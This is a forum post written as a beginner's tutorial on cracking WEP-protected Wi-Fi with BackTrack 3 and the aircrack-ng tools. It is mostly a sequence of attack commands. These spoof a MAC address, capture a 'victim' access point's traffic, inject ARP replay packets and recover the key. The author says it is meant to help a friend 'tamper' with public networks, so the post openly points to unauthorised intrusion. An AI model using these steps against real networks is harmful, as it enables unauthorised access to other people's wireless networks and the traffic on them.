Cracking WEP For Beginners
hackfreak
Fellas How u all doing..!! Am Rolling out with a Hard time..So i cant
posts threads Everyday as Before, But i am doing tha Best as wat i
can..Now we gonnna see how to crack WEP (I believe u m8 be read my
previious threads, regarding Wireless terms, i explored in last month
thread, so if not take a time read those and come back here).... I Am
Actuallly writing this Stuff, Coz Ma Buddy ""Attitude killler""
approached me fr a help(i swear he never asked me before) So this will
give a headstart fr n00bs, and my buddy who is tryina tamper some
public shits, Wireless have been Protected By WEP as we all kno, But
WEP Surpassed By WPA , Then WPA2..Still WEP Is considered as
Protection for Wireless Technologies....So Lets Jump in..
What you will need
* 1 copy of BackTrack 3 *newest release* http://www.remote-exploit.org/backtrack.html
(GOOGLE IT)
* 1 wireless router
* Laptop with wireless capabilities/wireless card -- There are a few
cards that can't do the injection!!!
* A secure place to work (so you don't disturb other AP's)
In order to crack a WEP key you must have a large number of encrypted
packets to work with. This is an unavoidable requirement if you wish
to be successful. The best way to get a large number of packets is to
perform an ARP request re injection attack (otherwise known as attack
-3). In order to do this attack and get results there must be a client
already authenticated with the AP, or connecting to the AP.
***********************************************************************
Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON'T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig EG:
eth0, eth1, ath0, ath1
(bssid) = This is the victims bssid *when you start airodump-ng if
there is a AP in range it will show up on the left side will look
similar to 00:11:22:33:44:55
************************************************************************
Now before we start we need to make a txt file in the home folder. On
the desktop you will see 2 icons home and system. Duble click the home
icon, rigt click the blank white area and select create new Txt File
name it exidous or what ever you want! click ok, now close the window.
Ok let's start!
Commands | Meaning
====================
*open up 3 shell konsoles by clicking the little black box next to the
start button.
* The first thing were going to do is stop the device aka ethernet
card
airmon-ng stop ath0
* Now were going to put the wireless card down, so we can fake a mac
adress (to see available wireless cards type, iwconfig
ifconfig (device) down
* Ok now just to make things simpler, so we don't have to hunt down
what our Mac address is
macchanger --mac 00:11:22:33:44:55 (device)
* Now were going to start the wireless card *make it listen for AP's
airmon-ng start (device)
* Lets start seeing what AP's are there
airodump-ng (device)
* After you see all the AP's execute the following command to stop it
and copy the bssid
CTRL+C Copy bssid of victom
* Now on to the victim's AP (were listening in for authentication
packets
airodump-ng -c 6 -w Exidous --bssid (Bssid) (device)
* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)
* Now were going to inject the router ***this sometimes takes a while
to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)
* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV's
for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV's for
128 bit encryption
aircrack-ng -n 64 --bssid (bssid) exidous-01.cap
* Once you crack the wep key you wright it down, and reboot to
windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this.
33C7C60930
I hope this tut. Helped!!! Just leave a comment ...i ll be pleased